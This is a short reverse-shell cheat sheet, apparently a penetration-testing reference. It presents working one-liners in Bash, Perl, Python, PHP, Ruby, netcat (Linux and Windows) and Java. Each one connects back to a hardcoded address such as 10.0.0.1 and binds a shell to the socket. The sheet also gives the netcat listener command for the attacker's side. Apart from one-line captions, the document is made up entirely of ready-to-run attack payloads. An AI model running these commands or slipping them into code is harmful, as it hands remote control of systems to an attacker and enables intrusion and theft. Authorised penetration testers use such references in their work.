A reverse shell provides an interactive command-line interface from a remote machine back to the attacker's machine. This is a crucial technique in penetration testing and security assessments. Below are examples of reverse shell commands implemented in various popular programming languages and tools.
The simplest and most common reverse shell, utilizing Bash's built-in networking capabilities.
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1A Perl script that establishes a TCP connection and executes a shell.
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'A Python one-liner to create a reverse shell, leveraging the `socket` and `subprocess` modules.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'A concise PHP snippet for establishing a reverse shell connection.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'A Ruby implementation for creating an interactive reverse shell.
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'Using Netcat (nc) for both initiating and listening for reverse shells. Note the use of `-e` for execution, which might not be available on all systems.
# Linux
nc -e /bin/sh target 4444 # or /bin/bash if sh doesn't work
# Windows
nc.exe 192.168.100.113 4444 –e cmd.exeThe command to set up a listener on the attacker's machine to receive incoming connections.
nc -lvnp 4444A Java reverse shell example that redirects standard input, output, and error streams to a TCP socket.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()